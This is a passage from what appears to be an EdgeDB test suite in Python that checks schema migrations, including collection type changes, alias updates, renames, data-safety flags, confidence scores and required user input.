r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
await self.migrate(r"""
type Base {
property first_name -> str;
property last_name -> str;
property name := .first_name ++ ' ' ++ .last_name;
# an index on a computable
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
async def test_edgeql_migration_eq_collections_01(self):
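# Add an array property to an existing type and populate it.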
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
property foo -> array<float32>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := [1.2, 4.5]
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[1.2, 4.5]],
)
async def test_edgeql_migration_eq_collections_02(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
property foo -> tuple<str, int32>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := ('hello', 42)
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[['hello', 42]],
)
async def test_edgeql_migration_eq_collections_03(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
# nested collection
property foo -> tuple<str, int32, array<float32>>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := ('test', 42, [1.2, 4.5])
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[['test', 42, [1.2, 4.5]]],
)
async def test_edgeql_migration_eq_collections_04(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
property foo -> tuple<a: str, b: int32>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := (a := 'hello', b := 42)
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[{'a': 'hello', 'b': 42}],
)
async def test_edgeql_migration_eq_collections_06(self):
await self.migrate(r"""
type Base {
property foo -> array<int32>;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := [1, 2]
}
""")
# sanity check
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[1, 2]],
)
await self.migrate(r"""
type Base {
property foo -> array<float64>;
}
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[1.0, 2.0]],
)
async def test_edgeql_migration_eq_collections_07(self):
await self.con.execute("""
SET MODULE test;
""")
await self.migrate(r"""
type Base {
# convert property type to tuple
property bar -> array<str>;
property foo -> tuple<str, int32>;
}
""")
await self.con.execute(r"""
INSERT Base {
bar := ['123'],
foo := ('test', <int32>7),
}
""")
await self.migrate(
r"""
type Base {
property bar -> array<int64>;
property foo -> tuple<str, int32, int32>;
}
""",
user_input=[
"<array<int64>>.bar",
"(.foo.0, .foo.1, 0)",
]
)
await self.assert_query_result(
r"""SELECT Base.bar;""",
[[123]],
)
await self.assert_query_result(
r"""SELECT Base.foo;""",
[['test', 7, 0]],
)
async def test_edgeql_migration_eq_collections_08(self):
await self.migrate(r"""
type Base {
property foo -> tuple<int32, int32>;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := (0, 8)
}
""")
await self.migrate(r"""
type Base {
# convert property type to a tuple with different (but
# cast-compatible) element types
property foo -> tuple<int64, int32>;
}
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[0, 8]],
)
async def test_edgeql_migration_eq_collections_09(self):
await self.migrate(r"""
type Base {
property foo -> tuple<str, int32>;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := ('test', 9)
}
""")
await self.migrate(r"""
type Base {
# convert property type from unnamed to named tuple
property foo -> tuple<a: str, b: int32>;
}
""")
# In theory, since under normal circumstances we can cast an
# unnamed tuple into named, it's reasonable to expect this
# migration to preserve data here.
await self.assert_query_result(
r"""SELECT Base.foo;""",
[{'a': 'test', 'b': 9}],
)
async def test_edgeql_migration_eq_collections_13(self):
await self.migrate(r"""
type Base {
property foo -> float32;
};
# aliases that don't have arrays
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 13.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 13.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[13.5],
)
await self.migrate(r"""
type Base {
property foo -> float32;
};
# "same" alias that now have arrays
alias BaseAlias := Base { bar := [Base.foo] };
alias CollAlias := [Base.foo];
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': [13.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[[13.5]],
)
async def test_edgeql_migration_eq_collections_14(self):
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# aliases that don't have tuples
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_14',
foo := 14.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 14.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[14.5],
)
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# "same" alias that now have tuples
alias BaseAlias := Base { bar := (Base.name, Base.foo) };
alias CollAlias := (Base.name, Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': ['coll_14', 14.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_14', 14.5]],
)
async def test_edgeql_migration_eq_collections_15(self):
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# aliases that don't have nested collections
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_15',
number := 15,
foo := 15.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 15.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[15.5],
)
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# "same" alias that now have nested collections
alias BaseAlias := Base {
bar := (Base.name, Base.number, [Base.foo])
};
alias CollAlias := (Base.name, Base.number, [Base.foo]);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': ['coll_15', 15, [15.5]]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_15', 15, [15.5]]],
)
async def test_edgeql_migration_eq_collections_16(self):
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# aliases that don't have named tuples
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_16',
foo := 16.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 16.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[16.5],
)
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# "same" alias that now have named tuples
alias BaseAlias := Base {
bar := (a := Base.name, b := Base.foo)
};
alias CollAlias := (a := Base.name, b := Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': {'a': 'coll_16', 'b': 16.5}}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[{'a': 'coll_16', 'b': 16.5}],
)
async def test_edgeql_migration_eq_collections_17(self):
await self.migrate(r"""
type Base {
property foo -> float32;
property bar -> int32;
};
# alias with array<int32>
alias BaseAlias := Base { data := [Base.bar] };
alias CollAlias := [Base.bar];
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 17.5,
bar := 17,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': [17]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[[17]],
)
await self.migrate(r"""
type Base {
property foo -> float32;
property bar -> int32;
};
# alias with array<float32>
alias BaseAlias := Base { data := [Base.foo] };
alias CollAlias := [Base.foo];
""")
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': [17.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[[17.5]],
)
async def test_edgeql_migration_eq_collections_18(self):
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, int32>
alias BaseAlias := Base {
data := (Base.name, Base.number)
};
alias CollAlias := (Base.name, Base.number);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_18',
number := 18,
foo := 18.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['coll_18', 18]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_18', 18]],
)
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, int32, float32>
alias BaseAlias := Base {
data := (Base.name, Base.number, Base.foo)
};
alias CollAlias := (Base.name, Base.number, Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['coll_18', 18, 18.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_18', 18, 18.5]],
)
async def test_edgeql_migration_eq_collections_20(self):
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, int32>
alias BaseAlias := Base {
data := (Base.name, Base.number)
};
alias CollAlias := (Base.name, Base.number);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'test20',
number := 20,
foo := 123.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['test20', 20]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['test20', 20]],
)
await self.migrate(r"""
type Base {
property name -> str;
property number -> int32;
property foo -> float32;
};
# alias with tuple<str, float32>
alias BaseAlias := Base {
data := (Base.name, Base.foo)
};
alias CollAlias := (Base.name, Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias {data};""",
[{'data': ['test20', 123.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['test20', 123.5]],
)
async def test_edgeql_migration_eq_collections_21(self):
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# alias with tuple<str, float32>
alias BaseAlias := Base {
data := (Base.name, Base.foo)
};
alias CollAlias := (Base.name, Base.foo);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'coll_21',
foo := 21.5,
}
""")
# make sure that the aliases are initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': ['coll_21', 21.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[['coll_21', 21.5]],
)
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# alias with named tuple<a: str, b: float32>
alias BaseAlias := Base {
data := (a := Base.name, b := Base.foo)
};
alias CollAlias := (a := Base.name, b := Base.foo);
""")
await self.assert_query_result(
r"""SELECT BaseAlias{data};""",
[{'data': {'a': 'coll_21', 'b': 21.5}}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[{'a': 'coll_21', 'b': 21.5}],
)
async def test_edgeql_migration_eq_drop_module(self):
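# Move the schema contents to a different module; only the
# new module should remain afterwards.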
await self.migrate(r"""
type Base;
""", module='test')
await self.migrate(r"""
scalar type foo extending std::str;
""", module='newtest')
await self.assert_query_result(
'SELECT (SELECT schema::Module FILTER .name LIKE "%test").name;',
['newtest']
)
async def test_edgeql_migration_inherited_optionality_01(self):
await self.migrate(r"""
type User;
type Message {
required link author -> User;
required property body -> str;
};
""")
await self.start_migration(r"""
type User;
type BaseMessage {
required link author -> User;
required property body -> str;
}
type Message extending BaseMessage;
""")
await self.fast_forward_describe_migration()
async def test_edgeql_migration_rename_type_02(self):
await self.migrate(r"""
type Note {
property note -> str;
}
type Subtype extending Note;
type Link {
link a -> Note;
}
type Uses {
required property x -> str {
default := (SELECT Note.note LIMIT 1)
}
};
type ComputeLink {
property foo -> str;
multi link x := (
SELECT Note FILTER Note.note = ComputeLink.foo);
};
alias Alias := Note;
""")
await self.migrate(r"""
type Remark {
property note -> str;
}
type Subtype extending Remark;
type Link {
link a -> Remark;
}
type Uses {
required property x -> str {
default := (SELECT Remark.note LIMIT 1)
}
};
type ComputeLink {
property foo -> str;
multi link x := (
SELECT Remark FILTER Remark.note = ComputeLink.foo);
};
alias Alias := Remark;
""")
await self.migrate("")
async def test_edgeql_migration_rename_type_03(self):
await self.migrate(r"""
type Note {
property note -> str;
}
""")
await self.migrate(r"""
type Remark {
property note -> str;
}
type Subtype extending Remark;
type Link {
link a -> Remark;
}
type Uses {
required property x -> str {
default := (SELECT Remark.note LIMIT 1)
}
};
type ComputeLink {
property foo -> str;
multi link x := (
SELECT Remark FILTER Remark.note = ComputeLink.foo);
};
alias Alias := Remark;
""")
await self.migrate("")
async def test_edgeql_migration_annotation_05(self):
await self.migrate(r"""
abstract inheritable annotation my_anno;
type Base {
property my_prop -> str {
annotation my_anno := 'Base my_anno 05';
}
}
type Derived extending Base {
overloaded property my_prop -> str {
annotation my_anno := 'Derived my_anno 05';
}
}
""")
await self.migrate(r"""
# rename annotated & inherited property
abstract inheritable annotation my_anno;
type Base {
property renamed_prop -> str {
annotation my_anno := 'Base my_anno 05';
}
}
type Derived extending Base {
overloaded property renamed_prop -> str {
annotation my_anno := 'Derived my_anno 05';
}
}
""")
await self.migrate("")
async def test_edgeql_migration_invalid_scalar_01(self):
with self.assertRaisesRegex(
edgedb.SchemaError,
r"may not have more than one concrete base type"):
await self.con.execute(r"""
START MIGRATION TO {
abstract scalar type test::lol extending str;
scalar type test::myint extending int64, test::lol;
};
POPULATE MIGRATION;
""")
async def test_edgeql_migration_scalar_array_01(self):
await self.migrate(r"""
type User {
required property scopes -> array<scope>;
}
scalar type scope extending int64 {
constraint one_of (1, 2);
}
""")
await self.migrate(r"""
type User {
required property scopes -> array<scope>;
}
scalar type scope extending int64 {
constraint one_of (1, 2, 3);
}
""")
async def test_edgeql_migration_scalar_array_02(self):
await self.migrate(r"""
scalar type scope extending int64;
""")
await self.migrate(r"""
type User {
required property scopes -> array<scope>;
}
scalar type scope extending int64 {
constraint one_of (1, 2);
}
""")
async def test_edgeql_migration_force_alter(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property foo -> str;
property bar -> str;
}
type Obj2 {
property o -> int64;
link o1 -> Obj1;
}
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property foo -> str;
property bar -> str;
}
type NewObj2 {
property name -> str;
annotation title := 'Obj2';
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::NewObj2 {\n'
" CREATE ANNOTATION std::title := 'Obj2';\n"
' CREATE PROPERTY name'
' -> std::str;\n'
'};'
}],
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
# We get the parts suggested to us granularly. We only bother
# to check the first one.
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj2 {\n'
' DROP LINK o1;\n'
'\n'
'};'
}],
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_non_ddl_statements(self):
await self.con.execute('SET MODULE test')
await self.start_migration('''
type Obj1 {
property foo -> str;
}
''')
await self.con.execute('SELECT 1')
await self.fast_forward_describe_migration(commit=False)
await self.con.execute('INSERT Obj1 { foo := "test" }')
await self.assert_describe_migration({
'confirmed': [
'SELECT 1;',
'CREATE TYPE test::Obj1 { CREATE PROPERTY foo -> std::str; };',
"INSERT Obj1 { foo := 'test' };"
],
'complete': True,
})
await self.con.execute('COMMIT MIGRATION')
await self.assert_query_result(
'SELECT Obj1 { foo }',
[{'foo': 'test'}],
)
async def test_edgeql_migration_extensions_01(self):
await self.con.execute('''
START MIGRATION TO {
using extension graphql;
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
"CREATE EXTENSION graphql VERSION '1.0';"
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT schema::Extension {
name,
}
FILTER .name = 'graphql'
""",
[{
'name': 'graphql',
}]
)
await self.con.execute('''
START MIGRATION TO {
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'DROP EXTENSION graphql;'
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration()
await self.assert_query_result(
r"""
SELECT schema::Extension {
name,
}
FILTER .name = 'graphql'
""",
[],
)
await self.con.execute('''
START MIGRATION TO {
using extension graphql version '1.0';
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
"CREATE EXTENSION graphql VERSION '1.0';"
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration()
async def test_edgeql_migration_confidence_01(self):
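        # Renaming Obj1 to NewObj1 is ambiguous with dropping and recreating it,
        # so the RENAME proposal carries reduced confidence; rejecting it falls
        # back to a plain CREATE at full confidence.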
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property foo -> str;
property bar -> str;
}
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type NewObj1 {
property foo -> str;
property bar -> str;
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj1 RENAME TO test::NewObj1;'
}],
'confidence': 0.637027,
},
})
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::NewObj1 {\n'
' CREATE PROPERTY bar -> std::str;'
'\n CREATE PROPERTY foo -> std::str;'
'\n};'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_confidence_02(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1;
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1;
type Obj2;
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::Obj2;'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_confidence_03(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1;
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
property x -> str;
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj1 {\n '
'CREATE PROPERTY x -> std::str;\n};'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_confidence_04(self):
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
link link -> Object;
}
};
};
''')
await self.fast_forward_describe_migration()
await self.con.execute('''
START MIGRATION TO {
module test {
type Obj1 {
link link -> Object {
property x -> str;
}
}
};
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text':
'ALTER TYPE test::Obj1 {\n '
'ALTER LINK link {\n '
'CREATE PROPERTY x -> std::str;\n };\n};'
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_data_safety_01(self):
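        # Walk through a series of proposed DDL statements and check the
        # data_safe flag reported for each kind of change.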
await self.start_migration('''
type Obj1;
''')
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj1;
type Obj2;
''')
# Creations are safe
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text':
'CREATE TYPE test::Obj2;'
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj1;
''')
# Deletions are NOT safe
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': 'DROP TYPE test::Obj2;'
}],
'data_safe': False,
},
})
await self.fast_forward_describe_migration()
# Renames are safe
await self.start_migration('''
type Obj11;
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': 'ALTER TYPE test::Obj1 RENAME TO test::Obj11;'
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Again, creations are safe.
await self.start_migration('''
type Obj11 {
property name -> str {
constraint exclusive;
}
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
CREATE PROPERTY name -> std::str {
CREATE CONSTRAINT std::exclusive;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
# Dropping constraints is safe.
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
DROP CONSTRAINT std::exclusive;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj11 {
property name -> str {
annotation title := 'name';
}
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
CREATE ANNOTATION std::title := 'name';
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Dropping annotations is fine also.
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
DROP ANNOTATION std::title;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
scalar type foo extending str;
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': "CREATE SCALAR TYPE test::foo EXTENDING std::str;",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Dropping scalar types is fine also.
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': "DROP SCALAR TYPE test::foo;",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
await self.start_migration('''
type Obj11 {
property name -> str;
index on (.name);
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
CREATE INDEX ON (.name);
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Dropping indexes is fine also.
await self.start_migration('''
type Obj11 {
property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
DROP INDEX ON (.name);
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# Changing single to multi is fine.
await self.start_migration('''
type Obj11 {
multi property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': """
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
SET MULTI;
};
};
""",
}],
'data_safe': True,
},
})
await self.fast_forward_describe_migration()
# But changing multi to single is NOT
await self.start_migration('''
type Obj11 {
single property name -> str;
}
''')
await self.assert_describe_migration({
'confirmed': [],
'proposed': {
'statements': [{
'text': r"""
ALTER TYPE test::Obj11 {
ALTER PROPERTY name {
SET SINGLE USING (\(conv_expr));
};
};
""",
}],
'data_safe': False,
},
})
await self.fast_forward_describe_migration(
user_input=[
'(SELECT .name LIMIT 1)'
]
)
async def test_edgeql_migration_prompt_id_01(self):
await self.start_migration('''
type Bar { link spam -> Spam };
type Spam { link bar -> Bar };
''')
await self.assert_describe_migration({
'proposed': {
'prompt_id': 'CreateObjectType TYPE test::Bar',
'statements': [{
'text': 'CREATE TYPE test::Bar;'
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration(limit=1)
await self.assert_describe_migration({
'proposed': {
'prompt_id': 'CreateObjectType TYPE test::Spam',
'statements': [{
'text': """
CREATE TYPE test::Spam {
CREATE LINK bar -> test::Bar;
};
""",
}],
'confidence': 1.0,
},
})
await self.fast_forward_describe_migration(limit=1)
# N.B: It is important that the prompt_id here match the
# prompt_id in the first migration, so that the migration tool
# will automatically apply this proposal as part of the
# earlier action.
await self.assert_describe_migration({
'proposed': {
'prompt_id': 'CreateObjectType TYPE test::Bar',
'statements': [{
'text': """
ALTER TYPE test::Bar {
CREATE LINK spam -> test::Spam;
};
""",
}],
'confidence': 1.0,
},
})
async def test_edgeql_migration_user_input_01(self):
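        # Changing a property's type requires a user-supplied cast expression
        # (the 'cast_expr' placeholder).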
await self.migrate('''
type Bar { property foo -> str };
''')
await self.start_migration('''
type Bar { property foo -> int64 };
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': '''
ALTER TYPE test::Bar {
ALTER PROPERTY foo {
SET TYPE std::int64 USING (\\(cast_expr));
};
};
'''
}],
'required_user_input': [{
'placeholder': 'cast_expr',
'prompt': (
"Please specify a conversion expression"
" to alter the type of property 'foo'"
),
}],
},
})
async def test_edgeql_migration_user_input_02(self):
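        # Changing a property from 'multi' to 'single' requires a user-supplied
        # conversion expression (the 'conv_expr' placeholder).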
await self.migrate('''
type Bar { multi property foo -> str };
''')
await self.start_migration('''
type Bar { single property foo -> str };
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': '''
ALTER TYPE test::Bar {
ALTER PROPERTY foo {
SET SINGLE USING (\\(conv_expr));
};
};
'''
}],
'required_user_input': [{
'placeholder': 'conv_expr',
'prompt': (
"Please specify an expression in order to convert"
" property 'foo' of object type 'test::Bar' to"
" 'single' cardinality"
),
}],
},
})
async def test_edgeql_migration_user_input_03(self):
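        # Making a new property required on a type with existing data requires
        # a fill expression (the 'fill_expr' placeholder) to populate existing
        # objects.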
await self.migrate('''
type Bar {
required property foo -> int64;
};
''')
await self.con.execute('''
SET MODULE test;
INSERT Bar { foo := 42 };
INSERT Bar { foo := 1337 };
''')
await self.start_migration('''
type Bar {
required property foo -> int64;
required property bar -> str;
};
''')
await self.assert_describe_migration({
'proposed': {
'statements': [{
'text': '''
ALTER TYPE test::Bar {
CREATE REQUIRED PROPERTY bar -> std::str {
SET REQUIRED USING (\\(fill_expr));
};
};
'''
}],
'required_user_input': [{
'placeholder': 'fill_expr',
'prompt': (
"Please specify an expression to populate existing "
"objects in order to make property 'bar' of object "
"type 'test::Bar' required"
),
}],
},
})
await self.fast_forward_describe_migration(
user_input=[
'<str>.foo ++ "!"'
]
)
await self.assert_query_result(
'''
SELECT Bar {foo, bar} ORDER BY .foo
''',
[
{'foo': 42, 'bar': "42!"},
{'foo': 1337, 'bar': "1337!"},
],
)
async def test_edgeql_migration_user_input_04(self):
await self.migrate('''
type BlogPost {
property title -> str;
}
''')
await self.con.execute('''
SET MODULE test;
INSERT BlogPost { title := "Programming Considered Harmful" }
''')
await self.start_migration('''
abstract type HasContent {
required property content -> str;
}
type BlogPost extending HasContent {
property title -> str;
}
''')
await self.interact([
"did you create object type 'test::HasContent'?",
("did you alter object type 'test::BlogPost'?", "y",
'"This page intentionally left blank"'),
# XXX: There is a final follow-up prompt, since the DDL
# generated above somewhat wrongly leaves 'content' owned
# by the child. This is kind of wrong, but also *works*, so
# maybe it's fine for now.
"did you alter property 'content' of object type "
"'test::BlogPost'?",
])
await self.fast_forward_describe_migration()
await self.assert_query_result(
'''
SELECT BlogPost {title, content}
''',
[
{
'title': "Programming Considered Harmful",
'content': "This page intentionally left blank",
},
],
)
async def test_edgeql_migration_union_01(self):
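        # A link to a union type (Article | Category) must not mix differing
        # computed versions of the same property.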
async with self.assertRaisesRegexTx(
edgedb.QueryError,
"it is illegal to create a type union that causes a "
"computed property 'deleted' to mix with other versions of the "
"same property 'deleted'"
):
await self.migrate('''
type Category {
required property title -> str;
required property deleted :=
EXISTS(.<element[IS DeletionRecord]);
};
type Article {
required property title -> str;
required property deleted :=
EXISTS(.<element[IS DeletionRecord]);
};
type DeletionRecord {
link element -> Article | Category;
}
''')
async def test_edgeql_migration_backlink_01(self):
await self.migrate('''
type User {
link posts := .<user;
}
abstract type Action {
required link user -> User;
}
type Post extending Action;
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT User;
''')
post = await self.con.query_single('''
INSERT Post {
user := (SELECT User LIMIT 1),
};
''')
await self.assert_query_result(
r'''
SELECT User{
id,
posts: {
id
} LIMIT 1 # this LIMIT is needed as a workaround
# for another bug
}
''',
[
{
'posts': [{'id': str(post.id)}],
},
],
)
async def test_edgeql_migration_misplaced_commands(self):
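        # Migration-control statements are only valid inside a migration block,
        # while statements such as CREATE DATABASE/ROLE, transactions and
        # CONFIGURE are rejected inside one.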
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute ALTER CURRENT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
ALTER CURRENT MIGRATION REJECT PROPOSED;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute DESCRIBE CURRENT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
